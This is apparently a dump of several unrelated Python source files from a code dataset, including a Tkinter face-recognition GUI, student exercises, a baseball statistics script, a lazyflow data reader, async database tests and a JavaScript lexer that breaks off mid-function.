self.capturarImagem[\"command\"] = self.capturaImagem\n self.capturarImagem.pack(side=LEFT)\n\n self.capturarImagem = Button(self.terceiroContainer)\n self.capturarImagem[\"text\"] = \"Treinar Algoritmos\"\n self.capturarImagem[\"font\"] = (\"Calibri\", \"8\")\n self.capturarImagem[\"width\"] = 23\n self.capturarImagem[\"command\"] = self.treinamento\n self.capturarImagem.pack(side=LEFT)\n\n\n # Quarto Container\n self.aprendendo = Label(self.quartoContainer, text=\"Scripts de Reconhecimento - IA\")\n self.aprendendo[\"font\"] = (\"Arial\", \"10\", \"italic\")\n self.aprendendo[\"bg\"] = '#353b48'\n self.aprendendo[\"fg\"] = '#f5f6fa'\n self.aprendendo.pack()\n\n self.eigenfaces = Button(self.quartoContainer)\n self.eigenfaces[\"text\"] = \"EigenFaces\"\n self.eigenfaces[\"font\"] = (\"Calibri\", \"8\")\n self.eigenfaces[\"width\"] = 15\n self.eigenfaces[\"command\"] = self.reconhecerEigen\n self.eigenfaces.pack(side=LEFT)\n\n self.fisherfaces = Button(self.quartoContainer)\n self.fisherfaces[\"text\"] = \"FisherFaces\"\n self.fisherfaces[\"font\"] = (\"Calibri\", \"8\")\n self.fisherfaces[\"width\"] = 15\n self.fisherfaces[\"command\"] = self.reconhecerFisher\n self.fisherfaces.pack(side=LEFT)\n\n self.lbph = Button(self.quartoContainer)\n self.lbph[\"text\"] = \"Script LBPH\"\n self.lbph[\"font\"] = (\"Calibri\", \"8\")\n self.lbph[\"width\"] = 15\n self.lbph[\"command\"] = self.reconhecerLBPH\n self.lbph.pack(side=LEFT)\n\n self.certificado = Label(self.quintoContainer, text=\"70% 50% 30%\")\n self.certificado[\"font\"] = (\"Arial\", \"10\", \"bold\")\n self.certificado[\"bg\"] = '#353b48'\n self.certificado[\"fg\"] = '#f5f6fa'\n self.certificado.pack(side=LEFT)\n\n self.obs = Label(self.sextoContainer, text=\"Obs: Chance de Erro do Scripts\\n 70% Chance de Erro com EigenFaces\\n 50% Chance de Erro com FisherFaces\\n 30% Chance de Erro com LBPH\")\n self.obs[\"font\"] = (\"Arial\", \"7\", \"italic\")\n self.obs[\"bg\"] = '#353b48'\n self.obs[\"fg\"] = '#f5f6fa'\n self.obs.pack(side=LEFT)\n\n # MÉTODO VERIFICADOR DE NOME E ID\n def capturaImagem(self):\n nome = self.nome.get()\n id = self.id.get()\n if nome != \"\":\n os.system('cls')\n print(\"Iniciando a Captura de Imagens\")\n captura.Captura(nome, id)\n else:\n os.system('cls')\n print(\"Falha ao Capturar Imagens Informe o Nome e o ID\")\n self.popUp()\n\n # MÉTODO DE TREINAMENTO DO ALGORITMOS\n def treinamento(self):\n mensagem = \"Iniciando Treinamento\"\n treinamento.Treinamento()\n\n # CHAMANDO O RECONHECEDOR EIGENFACES\n def reconhecerEigen(self):\n reconhecedor_eigenfaces.ReconhecerEigenFaces()\n\n # CHAMANDO O RECONHECEDOR FISHERFACES\n def reconhecerFisher(self):\n reconhecedor_fisherfaces.ReconhecerFisherFaces()\n\n # CHAMANDO O RECONHECEDOR LBPH\n def reconhecerLBPH(self):\n reconhecedor_lbph.ReconhecerLBPH()\n\n # ABRINDO O POPUP DE MENSAGEM DE NÃO TER INSERIDO O NOME E O ID\n def popUp(self):\n\n semNome = Tk()\n semNome.title(\"Erro 404 - Nome Não Encontrado\")\n\n frm_width = semNome.winfo_rootx() - semNome.winfo_x()\n win_width = 500 + 2 * frm_width\n win_height = 120 + frm_width\n x = semNome.winfo_screenwidth() // 2 - win_width // 2\n y = semNome.winfo_screenheight() // 2 - win_height // 2\n\n semNome.geometry('500x120+{}+{}'.format(x, y))\n semNome['bg'] = '#353b48'\n\n popup.Popup(semNome)\n semNome.mainloop()\n\nroot = Tk()\nApplication(root)\nroot.mainloop()","sub_path":"2/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"521366803","text":"# По введенным пользователем координатам двух точек\n# вывести уравнение прямой вида y = kx + b, проходящей через эти точки.\nxy = input(\"введите координаты точек через пробел\")\nx1, y1, x2, y2 = xy.split(\" \")\nx1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n# y1 = k * x1 + b\n# y2 = k * x2 + b\n# b = y2 - k * x2\n# y1 = k * x1 + y2 - k * x2\n# -k = -y1 / x1 + y2 / x2\n\nk = (y1 - y2) / (x1 - x2)\nb = y2 - k * x2\n\nprint(f\"уравнение прямой по заданным точкам: y = {k} * x + {b}\")","sub_path":"lesson_1/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191682732","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom frames import games, info, events\n\nplays = games.query(\"type == 'play' & event != 'NP'\")\nplays.columns = ['type', 'inning', 'team', 'player', 'count', 'pitches',\n 'event', 'game_id', 'year']\n\n# The shift() function moves the index a specified amount up or down. The\n# following row condition selects all rows that do not match a consecutive\n# row in the player column.\npa = plays.loc[plays['player'].shift() != plays['player'],\n ['year', 'game_id', 'inning', 'team', 'player']]\n# The DataFrame becomes a groupby object that also contains a new column\n# that calculates the plate appearance for each team for each game, which is\n# then converted to a DataFrame.\npa = pa.groupby(['year', 'game_id', 'team']).size().reset_index(name='PA')\n\n# Set the index of the events DataFrame to four columns.\nevents = events.set_index(['year', 'game_id', 'team', 'event_type'])\n# The events DataFrame is unstacked.\nevents = events.unstack().fillna(0).reset_index()\n# The column labels are managed.\nevents.columns = events.columns.droplevel()\nevents.columns = ['year', 'game_id', 'team', 'BB', 'E', 'H', 'HBP', 'HR',\n 'ROE', 'SO']\nevents = events.rename_axis(None, axis='columns')\n\n# The DataFrames containing the plate appearances data are merged.\nevents_plus_pa = pd.merge(events, pa, how='outer',\n left_on=['year', 'game_id', 'team'],\n right_on=['year', 'game_id', 'team'])\n\n# The DataFrames containing team data are merged to determine which league\n# was the home team and which was the visiting team.\ndefense = pd.merge(events_plus_pa, info)\n# The Defense Efficiency Ratio (DER), which is a metric to gauge team\n# defense, is calculated.\ndefense.loc[:, 'DER'] = 1 - ((defense['H'] + defense['ROE']) / (defense[\n 'PA'] - defense['BB'] - defense['SO'] - defense['HBP'] - defense['HR']))\ndefense.loc[:, 'year'] = pd.to_numeric(defense['year'])\n\n# The DER DataFrame is reshaped to allow the DER of the All-star teams in\n# the last 40 years to be plotted.\nder = defense.loc[defense['year'] >= 1978, ['year', 'defense', 'DER']]\nder = der.pivot(index='year', columns='defense', values='DER')\n\n# The DER plot is plotted with the default line plot type.\nder.plot(x_compat=True, xticks=range(1978, 2018, 4), rot=45)\nplt.show()\n","sub_path":"stats/defense.py","file_name":"defense.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82332269","text":"import requests_cache\nimport os\nimport shutil\n\n\n# http://stackoverflow.com/a/3013910/282024\ndef lazyprop(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop\n\n# Monkey patch the sqlite cache in requests_cache so that it\ndefault_dbdict_set_item = requests_cache.backends.storage.dbdict.DbPickleDict.__setitem__\ndefault_dbdict_get_item = requests_cache.backends.storage.dbdict.DbPickleDict.__getitem__\nAUTH_HEADER = 'Authorization'\n\n\ndef dbdict_set_item(self, key, item):\n store = item[0]\n if AUTH_HEADER in store.request.headers:\n store.request.headers[AUTH_HEADER] = '***'\n default_dbdict_set_item(self, key, item)\n\n\ndef dbdict_get_item(self, key):\n item = default_dbdict_get_item(self, key)\n store = item[0]\n if AUTH_HEADER in store.request.headers and \\\n store.request.headers[AUTH_HEADER] != '***':\n raise ValueError(\"Auth header was serialized\")\n return item\n\nrequests_cache.backends.storage.dbdict.DbPickleDict.__setitem__ = dbdict_set_item\nrequests_cache.backends.storage.dbdict.DbPickleDict.__getitem__ = dbdict_get_item\n\n\ndef use_requests_cache(cache):\n requests_cache.install_cache(cache, allowable_methods=('GET', 'POST', 'DELETE', 'PUT'))\n\n\ndef clean_directory(path, skip=[]):\n to_remove = (os.path.join(path, file_or_dir)\n for file_or_dir in os.listdir(path)\n if file_or_dir not in skip)\n for item in to_remove:\n if os.path.isdir(item):\n shutil.rmtree(item)\n else:\n os.remove(item)\n","sub_path":"clarity_ext/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"589896605","text":"import nose.tools as nt\nimport json\nimport sqlite3\nimport asyncio\n\nfrom aiohttp.test_utils import unittest_run_loop\nfrom aiohttp import web\nfrom aiohttp import ClientSession\n\nfrom asynctransaction.data.access.base import prepare_connection, DataAccessBase\nfrom asynctransaction.data.access.transaction import Transaction\nfrom asynctransaction.data.access.processing_step import ProcessingStep as ProcessingAccess\nfrom asynctransaction.data.entity import *\n\n\n# noinspection PyMissingConstructor\nclass TestClient(ClientSession):\n def __init__(self, response: web.Response):\n self.response = response\n\n async def request(self, method, url, **kwargs) -> web.Response:\n return self.response\n\n\nclass TestRequest(web.BaseRequest):\n # noinspection PyMissingConstructor\n def __init__(self, data):\n self.data = data\n\n async def json(self, *, loads=json.loads):\n return self.data\n\n\nclass TestTransaction:\n def __init__(self):\n self.dbh: sqlite3.Connection = None\n self.tc: Transaction = None\n self.loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()\n\n def setup(self):\n self.dbh = prepare_connection()\n cursor: sqlite3.Cursor = self.dbh.cursor()\n with open('asynctransaction/data/model/transaction.sql') as prepare_db:\n prepare_sql = prepare_db.read()\n cursor.executescript(str(prepare_sql))\n with open('asynctransaction/data/model/test_data.sql') as prepare_db:\n prepare_sql = prepare_db.read()\n cursor.executescript(str(prepare_sql))\n self.tc = Transaction(self.dbh)\n\n def teardown(self):\n self.dbh.close()\n\n def test_ctor(self):\n nt.assert_true(isinstance(self.tc.data, list))\n nt.assert_equal(len(self.tc.data), 0)\n\n @unittest_run_loop\n async def test_bad_receive_bad_body(self):\n nt.assert_equal(await self.tc.receive(TestRequest(data={})), State.BadRequestMandatoryKey)\n\n @unittest_run_loop\n async def test_bad_receive_no_data(self):\n data = {'DATA': {}, 'PARTNER_ID': 1, 'EVENT_ID': 23}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data)), State.BadRequestMandatoryKey)\n\n @unittest_run_loop\n async def test_bad_receive_str_data(self):\n data = 'DATA'\n with nt.assert_raises(AttributeError):\n await self.tc.receive(TestRequest(data=data))\n\n @unittest_run_loop\n async def test_bad_receive_bad_data_format(self):\n data = {'DATA': 3001, 'PARTNER_ID': 1, 'EVENT_ID': 23}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data)), State.BadRequestNotStoreAble)\n\n @unittest_run_loop\n async def test_bad_receive_wrong_data_type(self):\n data = {'DATA': 'text', 'PARTNER_ID': 1, 'EVENT_ID': 23}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data)), State.BadRequestNotStoreAble)\n\n @unittest_run_loop\n async def test_receive(self):\n data = {'DATA': {'ID': 3876, 'DATA': 'important things'}, 'PARTNER_ID': 1, 'EVENT_ID': 23}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data)), State.RequestReceived)\n\n @unittest_run_loop\n async def test_bad_event_receive(self):\n data = {'DATA': {'ID': 3876, 'DATA': 'important things'}, 'PARTNER_ID': 1}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data)), State.BadRequestMandatoryKey)\n\n @unittest_run_loop\n async def test_receive_with_event(self):\n this_event = Event(**{'ID': 1})\n data = {'DATA': {'ID': 3876, 'DATA': 'important things'}, 'PARTNER_ID': 1}\n nt.assert_equal(await self.tc.receive(TestRequest(data=data), this_event=this_event),\n State.RequestReceived)\n\n @unittest_run_loop\n async def test_bad_store_db_error(self):\n data = {'LOCAL_ID': 238, 'PARTNER_ID': 100, 'EVENT_ID': 100,\n 'DATA': json.dumps({'ID': 238, 'DATA': 'confuser cat'})}\n self.tc.data.clear()\n self.tc.data.append(Task(**data))\n nt.assert_equal(await self.tc.store(), State.BadRequestDBError)\n\n @unittest_run_loop\n async def test_bad_store_conflict(self):\n data = {'LOCAL_ID': 238, 'PARTNER_ID': 1, 'EVENT_ID': 1,\n 'DATA': json.dumps({'ID': 238, 'DATA': 'confuser cat'})}\n self.tc.data.clear()\n self.tc.data.append(Task(**data))\n nt.assert_equal(await self.tc.store(), State.ConflictRequest)\n\n @unittest_run_loop\n async def test_store(self):\n data = {'LOCAL_ID': 238, 'PARTNER_ID': 1, 'EVENT_ID': 2,\n 'DATA': json.dumps({'ID': 238, 'DATA': 'confuser cat update'})}\n self.tc.data.clear()\n self.tc.data.append(Task(**data))\n nt.assert_equal(await self.tc.store(), State.RequestStored)\n\n @unittest_run_loop\n async def test_spread(self):\n for row in self.dbh.execute(\"SELECT ID FROM TASKS WHERE STATE=1\"):\n nt.assert_equal(await self.tc.spread(row['ID']), State.RequestStored)\n\n @unittest_run_loop\n async def test_bad_spread(self):\n self.dbh.execute('DROP TABLE PROCESSING_STEPS')\n self.dbh.commit()\n with nt.assert_raises(sqlite3.Error):\n await self.tc.spread(task_id=1)\n\n @unittest_run_loop\n async def test_datetime(self):\n dac = DataAccessBase(self.dbh, 'TASKS')\n await dac.read()\n for row in dac.data:\n nt.assert_is_instance(row.updated_on, datetime)\n\n @unittest_run_loop\n async def test_read(self):\n dac = DataAccessBase(self.dbh, 'PARTNERS')\n await dac.read()\n nt.assert_equal(len(dac.data), 2)\n for record in dac.data:\n nt.assert_equal(record.name, 'PARTNERS')\n nt.assert_greater(record.id, 0)\n\n @unittest_run_loop\n async def test_read_joined_tasks(self):\n dac = DataAccessBase(self.dbh, 'TASKS')\n await dac.read()\n nt.assert_equal(len(dac.data), 1)\n\n @unittest_run_loop\n async def test_read_joined_processing_steps(self):\n dac = DataAccessBase(self.dbh, 'PROCESSING_STEPS')\n await dac.read(entity_id=1)\n nt.assert_equal(len(dac.data), 1)\n\n @unittest_run_loop\n async def test_read_joined_by_id(self):\n dac = DataAccessBase(self.dbh, 'TASKS')\n await dac.read(entity_id=1)\n nt.assert_equal(len(dac.data), 1)\n\n @unittest_run_loop\n async def test_update_state(self):\n dac = ProcessingAccess(self.dbh)\n nt.assert_equal(await dac.update_state(0), 0)\n dac.data.clear()\n dac.data.append(ProcessingStep(ID=1))\n await dac.read(entity_id=1, no_join=True)\n nt.assert_greater_equal(len(dac.data), 1)\n state_before = dac.get_result(False).state\n nt.assert_equal(await dac.update_state(2), 1)\n await dac.read(entity_id=1, no_join=True)\n nt.assert_equal(dac.get_result(False).state, state_before + 1)\n nt.assert_equal(await dac.update_state(to_state=5), 1)\n await dac.read(entity_id=1, no_join=True)\n nt.assert_equal(dac.get_result(False).state, 5)\n\n @unittest_run_loop\n async def test_process(self):\n dac = ProcessingAccess(self.dbh)\n await dac.read(entity_id=1)\n nt.assert_greater_equal(len(dac.data), 1)\n client = TestClient(web.HTTPOk())\n result = await self.tc.process(dac.get_result(), client)\n nt.assert_equal(result, State.RequestStored)\n\n @unittest_run_loop\n async def test_bad_process(self):\n dac = ProcessingAccess(self.dbh)\n await dac.read(entity_id=1)\n nt.assert_greater_equal(len(dac.data), 1)\n client = TestClient(web.HTTPBadRequest())\n nt.assert_equal(await self.tc.process(dac.get_result(), client), State.BadRequest)\n\n @unittest_run_loop\n async def test_no_client_connection(self):\n dac = ProcessingAccess(self.dbh)\n await dac.read(entity_id=1)\n nt.assert_greater_equal(len(dac.data), 1)\n client = ClientSession(loop=self.loop, conn_timeout=1.0)\n nt.assert_equal(await self.tc.process(dac.get_result(), client), State.BadRequest)\n","sub_path":"tests/test_data_access_transaction.py","file_name":"test_data_access_transaction.py","file_ext":"py","file_size_in_byte":8071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"554893527","text":"def evaluaEdad(edad):\n\n\tif edad<0:\n\t\traise TypeError(\"Edad negativa!\") #Podemos personalizar el mensaje de error\n\n\tif edad<20:\n\t\treturn \"eres muy joven pipiolo\"\n\telif edad<40:\n\t\treturn \"eres viejoven\"\n\telif edad<65:\n\t\treturn \"eres viejo\"\n\telif edad<100:\n\t\treturn \"Hueles a tierra\"\n\nprint(evaluaEdad(18))","sub_path":"profe/prueba_excepciones3.py","file_name":"prueba_excepciones3.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557355088","text":"class Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n\n\n\nSo = Solution()\nnums1 = [1, 1]\nnums2 = [1, 2]\nprint(So.findMedianSortedArrays(nums1, nums2))\n","sub_path":"vol 0/004 Todo.py","file_name":"004 Todo.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"96437691","text":"from lazyflow.graph import Operator, InputSlot, OutputSlot\nfrom lazyflow.operators import OpImageReader, OpBlockedArrayCache\nfrom opStreamingHdf5Reader import OpStreamingHdf5Reader\nfrom opNpyFileReader import OpNpyFileReader\nfrom lazyflow.operators.ioOperators import OpStackLoader, OpBlockwiseFilesetReader, OpRESTfulBlockwiseFilesetReader\nfrom lazyflow.utility.jsonConfig import JsonConfigParser\n\nimport h5py\nimport vigra\nimport os\nimport logging\n\nclass OpInputDataReader(Operator):\n \"\"\"\n This operator can read input data of any supported type.\n The data format is determined from the file extension.\n \"\"\"\n name = \"OpInputDataReader\"\n category = \"Input\"\n\n h5Exts = ['h5', 'hdf5', 'ilp']\n npyExts = ['npy']\n blockwiseExts = ['json']\n vigraImpexExts = vigra.impex.listExtensions().split()\n SupportedExtensions = h5Exts + npyExts + vigraImpexExts + blockwiseExts\n\n # FilePath is inspected to determine data type.\n # For hdf5 files, append the internal path to the filepath,\n # e.g. /mydir/myfile.h5/internal/path/to/dataset\n # For stacks, provide a globstring, e.g. /mydir/input*.png\n # Other types are determined via file extension\n WorkingDirectory = InputSlot(stype='filestring', optional=True)\n FilePath = InputSlot(stype='filestring')\n Output = OutputSlot()\n \n loggingName = __name__ + \".OpInputDataReader\"\n logger = logging.getLogger(loggingName)\n\n class DatasetReadError(Exception):\n pass\n\n def __init__(self, *args, **kwargs):\n super(OpInputDataReader, self).__init__(*args, **kwargs)\n self.internalOperator = None\n self.internalOutput = None\n self._file = None\n\n def cleanUp(self):\n super(OpInputDataReader, self).cleanUp()\n if self._file is not None:\n self._file.close()\n\n def setupOutputs(self):\n \"\"\"\n Inspect the file name and instantiate and connect an internal operator of the appropriate type.\n TODO: Handle datasets of non-standard (non-5d) dimensions.\n \"\"\"\n filePath = self.FilePath.value\n assert type(filePath) == str, \"Error: filePath is not of type str. It's of type {}\".format(type(filePath))\n\n # Does this look like a relative path?\n useRelativePath = not os.path.isabs(filePath)\n\n if useRelativePath:\n # If using a relative path, we need both inputs before proceeding\n if not self.WorkingDirectory.ready():\n return\n else:\n # Convert this relative path into an absolute path\n filePath = os.path.normpath(os.path.join(self.WorkingDirectory.value, filePath)).replace('\\\\','/')\n\n # Clean up before reconfiguring\n if self.internalOperator is not None:\n self.Output.disconnect()\n self.internalOperator.cleanUp()\n self.internalOperator = None\n self.internalOutput = None\n if self._file is not None:\n self._file.close()\n\n openFuncs = [ self._attemptOpenAsStack,\n self._attemptOpenAsHdf5,\n self._attemptOpenAsNpy,\n self._attemptOpenAsBlockwiseFileset,\n self._attemptOpenAsRESTfulBlockwiseFileset,\n self._attemptOpenWithVigraImpex ]\n\n # Try every method of opening the file until one works.\n iterFunc = openFuncs.__iter__()\n while self.internalOperator is None:\n try:\n openFunc = iterFunc.next()\n except StopIteration:\n break\n self.internalOperator, self.internalOutput = openFunc(filePath)\n\n if self.internalOutput is None:\n raise RuntimeError(\"Can't read \" + filePath + \" because it has an unrecognized format.\")\n\n # Directly connect our own output to the internal output\n self.Output.connect( self.internalOutput )\n \n def _attemptOpenAsStack(self, filePath):\n if '*' in filePath:\n stackReader = OpStackLoader(parent=self)\n stackReader.globstring.setValue(filePath)\n return (stackReader, stackReader.stack)\n else:\n return (None, None)\n\n def _attemptOpenAsHdf5(self, filePath):\n # Check for an hdf5 extension\n h5Exts = OpInputDataReader.h5Exts + ['ilp']\n h5Exts = ['.' + ex for ex in h5Exts]\n ext = None\n for x in h5Exts:\n if x in filePath:\n ext = x\n\n if ext is None:\n return (None, None)\n\n externalPath = filePath.split(ext)[0] + ext\n internalPath = filePath.split(ext)[1]\n\n if not os.path.exists(externalPath):\n raise OpInputDataReader.DatasetReadError(\"Input file does not exist: \" + externalPath)\n\n # Open the h5 file in read-only mode\n try:\n h5File = h5py.File(externalPath, 'r')\n except Exception as e:\n msg = \"Unable to open HDF5 File: {}\".format( externalPath )\n if hasattr(e, 'message'):\n msg += e.message\n raise OpInputDataReader.DatasetReadError( msg )\n self._file = h5File\n\n h5Reader = OpStreamingHdf5Reader(parent=self)\n h5Reader.Hdf5File.setValue(h5File)\n\n # Can't set the internal path yet if we don't have one\n assert internalPath != '', \\\n \"When using hdf5, you must append the hdf5 internal path to the \"\\\n \"data set to your filename, e.g. myfile.h5/volume/data \"\\\n \"No internal path provided for dataset in file: {}\".format( externalPath )\n\n try:\n h5Reader.InternalPath.setValue(internalPath)\n except OpStreamingHdf5Reader.DatasetReadError as e:\n msg = \"Error reading HDF5 File: {}\".format(externalPath)\n msg += e.msg\n raise OpInputDataReader.DatasetReadError( msg )\n\n return (h5Reader, h5Reader.OutputImage)\n\n def _attemptOpenAsNpy(self, filePath):\n fileExtension = os.path.splitext(filePath)[1].lower()\n fileExtension = fileExtension.lstrip('.') # Remove leading dot\n\n # Check for numpy extension\n if fileExtension not in OpInputDataReader.npyExts:\n return (None, None)\n else:\n try:\n # Create an internal operator\n npyReader = OpNpyFileReader(parent=self)\n npyReader.FileName.setValue(filePath)\n return (npyReader, npyReader.Output)\n except OpNpyFileReader.DatasetReadError as e:\n raise OpInputDataReader.DatasetReadError( *e.args )\n\n def _attemptOpenAsBlockwiseFileset(self, filePath):\n fileExtension = os.path.splitext(filePath)[1].lower()\n fileExtension = fileExtension.lstrip('.') # Remove leading dot\n\n if fileExtension in OpInputDataReader.blockwiseExts:\n opReader = OpBlockwiseFilesetReader(parent=self)\n try:\n # This will raise a SchemaError if this is the wrong type of json config.\n opReader.DescriptionFilePath.setValue( filePath )\n return (opReader, opReader.Output)\n except JsonConfigParser.SchemaError:\n opReader.cleanUp()\n except OpBlockwiseFilesetReader.MissingDatasetError as e:\n raise OpInputDataReader.DatasetReadError(*e.args)\n return (None, None)\n\n def _attemptOpenAsRESTfulBlockwiseFileset(self, filePath):\n fileExtension = os.path.splitext(filePath)[1].lower()\n fileExtension = fileExtension.lstrip('.') # Remove leading dot\n\n if fileExtension in OpInputDataReader.blockwiseExts:\n opReader = OpRESTfulBlockwiseFilesetReader(parent=self)\n try:\n # This will raise a SchemaError if this is the wrong type of json config.\n opReader.DescriptionFilePath.setValue( filePath )\n return (opReader, opReader.Output)\n except JsonConfigParser.SchemaError:\n opReader.cleanUp()\n except OpRESTfulBlockwiseFilesetReader.MissingDatasetError as e:\n raise OpInputDataReader.DatasetReadError(*e.args)\n return (None, None)\n\n def _attemptOpenWithVigraImpex(self, filePath):\n fileExtension = os.path.splitext(filePath)[1].lower()\n fileExtension = fileExtension.lstrip('.') # Remove leading dot\n\n if fileExtension not in OpInputDataReader.vigraImpexExts:\n return (None, None)\n\n if not os.path.exists(filePath):\n raise OpInputDataReader.DatasetReadError(\"Input file does not exist: \" + filePath)\n\n vigraReader = OpImageReader(parent=self)\n vigraReader.Filename.setValue(filePath)\n\n # Cache the image instead of reading the hard disk for every access.\n imageCache = OpBlockedArrayCache(parent=self)\n imageCache.Input.connect(vigraReader.Image)\n \n # 2D: Just one block for the whole image\n cacheBlockShape = vigraReader.Image.meta.shape\n \n taggedShape = vigraReader.Image.meta.getTaggedShape()\n if 'z' in taggedShape.keys():\n # 3D: blocksize is one slice.\n taggedShape['z'] = 1\n cacheBlockShape = tuple(taggedShape.values())\n \n imageCache.fixAtCurrent.setValue( False ) \n imageCache.innerBlockShape.setValue( cacheBlockShape ) \n imageCache.outerBlockShape.setValue( cacheBlockShape ) \n assert imageCache.Output.ready()\n \n return (imageCache, imageCache.Output)\n\n def execute(self, slot, subindex, roi, result):\n assert False, \"Shouldn't get here because our output is directly connected...\"\n\n def propagateDirty(self, slot, subindex, roi):\n # Output slots are directly conncted to internal operators\n pass\n\n @classmethod\n def getInternalDatasets(cls, filePath):\n \"\"\"\n Search the given file for internal datasets, and return their internal paths as a list.\n For now, it is assumed that the file is an hdf5 file.\n \n Returns: A list of the internal datasets in the file, or None if the format doesn't support internal datasets.\n \"\"\"\n datasetNames = None\n ext = os.path.splitext(filePath)[1][1:]\n \n # HDF5. Other formats don't contain more than one dataset (as far as we're concerned).\n if ext in OpInputDataReader.h5Exts:\n datasetNames = []\n # Open the file as a read-only so we can get a list of the internal paths\n with h5py.File(filePath, 'r') as f:\n # Define a closure to collect all of the dataset names in the file.\n def accumulateDatasetPaths(name, val):\n if type(val) == h5py._hl.dataset.Dataset and 3 <= len(val.shape) <= 5:\n datasetNames.append( '/' + name ) \n # Visit every group/dataset in the file \n f.visititems(accumulateDatasetPaths) \n\n return datasetNames\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lazyflow/operators/ioOperators/opInputDataReader.py","file_name":"opInputDataReader.py","file_ext":"py","file_size_in_byte":11027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"339692336","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 21 11:03:26 2016\n\n@author: Florian\n\"\"\"\nimport csv\ndef spotpy_csv_shrinker(in_name, out_name, thresh_NS):\n \"\"\"\n Goes through a csv file produced by Spotpy and creates\n a new csv file with all entries above eff_thresh\n \"\"\"\n # create an empy list to temp save the data\n temp = []\n # read through the file\n with open(in_name, newline=\"\") as csv_in:\n reader = csv.reader(csv_in, delimiter = \",\")\n for row in reader:\n # use try to avoid problems with \"nan\" and \"efficieny\"\n try:\n # only write those values to the file that are above thresh\n if float(row[0]) > thresh_NS:\n temp.append(row)\n except ValueError:\n # Add the first row if it pops upp\n if row[0] == \"like1\":\n temp.append(row)\n \n # write the new csv file\n with open(out_name, \"w\", newline = \"\") as csv_out:\n writer = csv.writer(csv_out, delimiter=\",\", quoting=csv.QUOTE_MINIMAL)\n for row in temp:\n writer.writerow(row)\n \n \n \nspotpy_csv_shrinker(\"simple_lumped.csv\",\n \"simple_lumped_short.csv\", 0.0)\n","sub_path":"lumped_intermediate/spotpy_csv_shrinker.py","file_name":"spotpy_csv_shrinker.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"84807603","text":"import pandas as pd\nfrom error import GestorError\nfrom table import GestorTablaSimbolo\nfrom util import resource_path\nfrom gci import Operando\n\n\nclass JSLexer:\n\n def __init__(self, gci, gestor_ts, gestor_err):\n self.code_file = None\n self.linea = None\n self.gci = gci\n self.gestor_ts = gestor_ts\n self.gestor_err = gestor_err\n self.tabla = pd.read_csv(resource_path('config/lexico_tabla.csv'), index_col=0, dtype=str)\n self._cast_columns_name = {'_': 4, ' ': 6, '\\n': 38, '\\t': 6, \"'\": 8, '\\\\': 10, '+': 12, '-': 14, '/': 16,\n '=': 18, '!': 20, '&': 22, '|': 24, ';': 26, ',': 28, '(': 30, ')': 32, '{': 34,\n '}': 36}\n\n def next_char(self):\n char = self.code_file.read(1)\n if not char:\n self.code_file.close()\n elif char == '\\n':\n self.linea += 1\n return char\n\n def cast_position(self, char):\n if char.isalpha():\n if char == 'n':\n return 42\n return 0\n elif char.isdigit():\n return 2\n elif char in self._cast_columns_name:\n return self._cast_columns_name[char]\n else:\n return 40\n\n def tokenize(self, path):\n self.code_file = open(path, 'r', encoding='UTF-8')\n self.linea = 1\n char = self.next_char()\n while char:\n estado = 0\n while estado < 12 and char:\n pos = self.cast_position(char)\n transicion = self.tabla.iloc[estado, pos]\n accion = self.tabla.iloc[estado, pos + 1]\n if pd.isnull(transicion):\n self.gestor_err.imprime('Léxico', self.gestor_err.error_lexico[int(accion)] + (f\" '{char}'\" if int(\n accion) == 101 else ''), self.linea)\n char = None\n break\n estado = int(transicion)\n\n if accion == 'A':\n char = self.next_char()\n elif accion == 'B':\n lexema = char\n char = self.next_char()\n elif accion == 'C':\n lexema += char\n char = self.next_char()\n elif accion == 'D':\n if lexema in {'alert', 'boolean', 'for', 'function', 'if', 'input', 'let', 'number', 'return',\n 'string', 'true', 'false'}:\n yield Token(lexema.upper(), '', self.linea)\n else:\n # if self.gestor_ts.busca_ts_activa(lexema) is None:\n # indice = self.gestor_ts.inserta_ts_activa(lexema)\n # else:\n # indice = self.gestor_ts.busca_ts(lexema)\n\n if self.gestor_ts.zona_decl:\n if self.gestor_ts.busca_ts_activa(lexema) is None:\n indice = self.gestor_ts.inserta_ts_activa(lexema)\n else:\n self.gestor_err.imprime('Semántico', 'Ya existe el identificador a declarar',\n self.linea)\n else:\n indice = self.gestor_ts.busca_ts(lexema)\n if indice is None:\n indice = self.gestor_ts.inserta_ts_global(lexema)\n 